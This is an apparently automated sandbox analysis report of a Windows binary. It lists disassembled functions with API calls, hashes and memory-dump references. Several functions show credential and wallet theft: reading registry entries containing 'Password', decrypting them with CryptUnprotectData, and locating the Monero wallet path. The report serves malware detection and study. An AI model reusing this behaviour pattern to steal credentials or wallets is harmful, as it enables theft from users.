                                    • Instruction ID: ffadfd9a1d74080007f34b768826427d41e262f2d3a3d10868011335538d6440
                                    • Opcode Fuzzy Hash: aec2073ff38d037e5ca26dfb3e69f4b7ab8582f1c5b59363524ff08266b3196c
                                    • Instruction Fuzzy Hash: E2512E75E11208AFDB10DFA4EC89EEEB7B9FF48301F10441AF905A3251DB34AE418BA1
                                    Function 000BDFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcat.KERNEL32(?,00E6E098), ref: 000BE00D
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 000BE037
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BE06F
                                    • lstrcat.KERNEL32(?,00000000), ref: 000BE07D
                                    • lstrcat.KERNEL32(?,?), ref: 000BE098
                                    • lstrcat.KERNEL32(?,?), ref: 000BE0AC
                                    • lstrcat.KERNEL32(?,00E5AFF0), ref: 000BE0C0
                                    • lstrcat.KERNEL32(?,?), ref: 000BE0D4
                                    • lstrcat.KERNEL32(?,00E6D508), ref: 000BE0E7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BE11F
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 000BE126
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                    • String ID:
                                    • API String ID: 4230089145-0
                                    • Opcode ID: 3eabd8a3e49394a866c72becce6956c6971bd116965193e8d13914e5e0a04a7c
                                    • Instruction ID: cda3b1345cc45cc3c33b10b2523136ce077cc6d9e14a41662c260b457ebda2dd
                                    • Opcode Fuzzy Hash: 3eabd8a3e49394a866c72becce6956c6971bd116965193e8d13914e5e0a04a7c
                                    • Instruction Fuzzy Hash: 5B615E71D1111CEBCB65EB68DC48ADDB7B8BF58300F1449A5F60AA3251EB70AF858F90
                                    Function 000ABBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000ABC1F
                                    • lstrlen.KERNEL32(00000000), ref: 000ABC52
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ABC7C
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000ABC84
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000ABCAC
                                    • lstrlen.KERNEL32(000D4AD4), ref: 000ABD23
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat
                                    • String ID:
                                    • API String ID: 2500673778-0
                                    • Opcode ID: bcd038afb967a728345a2ba35327121d75952cc82757d5c25cc20e4eec6bec23
                                    • Instruction ID: 20ae8e78d5457c5479e25938c64c5f1f6b3efba391738bb16ced723d1f3f7e51
                                    • Opcode Fuzzy Hash: bcd038afb967a728345a2ba35327121d75952cc82757d5c25cc20e4eec6bec23
                                    • Instruction Fuzzy Hash: 4FA15030A01205CFCB65DFA8E949AAEB7F1AF46305F18806AF409DB663EB31DC41CB51
                                    Function 000C5EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000C5F2A
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000C5F49
                                    • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 000C6014
                                    • memmove.MSVCRT(00000000,00000000,?), ref: 000C609F
                                    • std::_Xinvalid_argument.LIBCPMT ref: 000C60D0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_$memmove
                                    • String ID: invalid string position$string too long
                                    • API String ID: 1975243496-4289949731
                                    • Opcode ID: be30719a393dbae534e0f7a8a7d3f9c84aeb9dbf5afad428d0db3de9eac2e87a
                                    • Instruction ID: 928cb8dce99c84cce018dd51a83e855d93c0b8a0f63a0d2fadd0e1c22b06221d
                                    • Opcode Fuzzy Hash: be30719a393dbae534e0f7a8a7d3f9c84aeb9dbf5afad428d0db3de9eac2e87a
                                    • Instruction Fuzzy Hash: 4D617B70700604DBDB28CF5CCC95E6EB3B6EF85305B344A2DE4929B782D732AD818B95
                                    Function 000BE049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BE06F
                                    • lstrcat.KERNEL32(?,00000000), ref: 000BE07D
                                    • lstrcat.KERNEL32(?,?), ref: 000BE098
                                    • lstrcat.KERNEL32(?,?), ref: 000BE0AC
                                    • lstrcat.KERNEL32(?,00E5AFF0), ref: 000BE0C0
                                    • lstrcat.KERNEL32(?,?), ref: 000BE0D4
                                    • lstrcat.KERNEL32(?,00E6D508), ref: 000BE0E7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BE11F
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 000BE126
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrcpy$AttributesFile
                                    • String ID:
                                    • API String ID: 3428472996-0
                                    • Opcode ID: 08a93092f407a9ef3d74fe77f5a3fee0f9ffd80cab6bee79ea5dd7448ca19631
                                    • Instruction ID: d36d008a460d35d0aadabd298e9311f4fd950a0836094c4aeed4c8f722b2c2eb
                                    • Opcode Fuzzy Hash: 08a93092f407a9ef3d74fe77f5a3fee0f9ffd80cab6bee79ea5dd7448ca19631
                                    • Instruction Fuzzy Hash: FB418D71D11118EBCB65EBA8EC49ADD73B4BF58300F1449A5F90A93252EB309F858F91
                                    Function 000A7A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 000A77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 000A7805
                                      • Part of subcall function 000A77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 000A784A
                                      • Part of subcall function 000A77D0: StrStrA.SHLWAPI(?,Password), ref: 000A78B8
                                      • Part of subcall function 000A77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 000A78EC
                                      • Part of subcall function 000A77D0: HeapFree.KERNEL32(00000000), ref: 000A78F3
                                    • lstrcat.KERNEL32(00000000,000D4AD4), ref: 000A7A90
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A7ABD
                                    • lstrcat.KERNEL32(00000000, : ), ref: 000A7ACF
                                    • lstrcat.KERNEL32(00000000,?), ref: 000A7AF0
                                    • wsprintfA.USER32 ref: 000A7B10
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A7B39
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000A7B47
                                    • lstrcat.KERNEL32(00000000,000D4AD4), ref: 000A7B60
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                                    • String ID: :
                                    • API String ID: 398153587-3653984579
                                    • Opcode ID: e4660e2f0d5ffbaa9467da49d466c8cd3361874a1aa2dc9a6b9208faeaed30a4
                                    • Instruction ID: 5cf32d96a69289b642b314e6682ec34a50d9059cdf37b25662b5f88784ff9f2d
                                    • Opcode Fuzzy Hash: e4660e2f0d5ffbaa9467da49d466c8cd3361874a1aa2dc9a6b9208faeaed30a4
                                    • Instruction Fuzzy Hash: A931D372E11214AFCB10DBA8EC489AFB7B9EB95301F18851AF50997301DB30ED40CBA1
                                    Function 000B81B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 000B820C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B8243
                                    • lstrlen.KERNEL32(00000000), ref: 000B8260
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B8297
                                    • lstrlen.KERNEL32(00000000), ref: 000B82B4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B82EB
                                    • lstrlen.KERNEL32(00000000), ref: 000B8308
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B8337
                                    • lstrlen.KERNEL32(00000000), ref: 000B8351
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B8380
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: e46aac7d4797bd76766a3c3f3ce0c5414ffdf74c1a7eec927203a795cb7d838e
                                    • Instruction ID: c2eedecee3446750ff97c0359ebc2353a8f97e7a7c206aa4f986ee7517860d80
                                    • Opcode Fuzzy Hash: e46aac7d4797bd76766a3c3f3ce0c5414ffdf74c1a7eec927203a795cb7d838e
                                    • Instruction Fuzzy Hash: CA517B71A016129FDB14DF68D858AABB7E8EF41B00F118524ED06DB665EB70EE50CBE0
                                    Function 000A77D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 000A7805
                                    • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 000A784A
                                    • StrStrA.SHLWAPI(?,Password), ref: 000A78B8
                                      • Part of subcall function 000A7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 000A775E
                                      • Part of subcall function 000A7750: RtlAllocateHeap.NTDLL(00000000), ref: 000A7765
                                      • Part of subcall function 000A7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000A778D
                                      • Part of subcall function 000A7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 000A77AD
                                      • Part of subcall function 000A7750: LocalFree.KERNEL32(?), ref: 000A77B7
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000A78EC
                                    • HeapFree.KERNEL32(00000000), ref: 000A78F3
                                    • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 000A7A35
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                    • String ID: Password
                                    • API String ID: 356768136-3434357891
                                    • Opcode ID: f0f9aab2b9de8be6c93f483025b0614186715a9f11442e942c58509cd5760ce5
                                    • Instruction ID: cd96a1fc76863dacc1d544f4b724085a598796ed466bea1c525a0c0d15ea3ece
                                    • Opcode Fuzzy Hash: f0f9aab2b9de8be6c93f483025b0614186715a9f11442e942c58509cd5760ce5
                                    • Instruction Fuzzy Hash: F87130B1D0421DAFDB10DFD4DC84AEEB7B9EF49300F10856AE609A7250EB359E85CB91
                                    Function 000C4500 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 95memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,000B4F39), ref: 000C4545
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000C454C
                                    • wsprintfW.USER32 ref: 000C455B
                                    • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 000C45CA
                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 000C45D9
                                    • CloseHandle.KERNEL32(00000000,?,?), ref: 000C45E0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                    • String ID: %hs
                                    • API String ID: 885711575-2783943728
                                    • Opcode ID: a887f87a02266e717e21fbcbc51608ec01f9d6dc5b3dd69adfd5be5a772f2f06
                                    • Instruction ID: c3e16582572d84592fd70358914723f04af2f373b4ff214697a74439b575c3a3
                                    • Opcode Fuzzy Hash: a887f87a02266e717e21fbcbc51608ec01f9d6dc5b3dd69adfd5be5a772f2f06
                                    • Instruction Fuzzy Hash: DC315E72E01209BBEB10DBE4EC49FDE77B8FF45701F10415AFA05A7181EB70AA458BA5
                                    Function 000A1120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 000A1135
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000A113C
                                    • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 000A1159
                                    • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 000A1173
                                    • RegCloseKey.ADVAPI32(?), ref: 000A117D
                                    Strings
                                    • wallet_path, xrefs: 000A116D
                                    • SOFTWARE\monero-project\monero-core, xrefs: 000A114F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
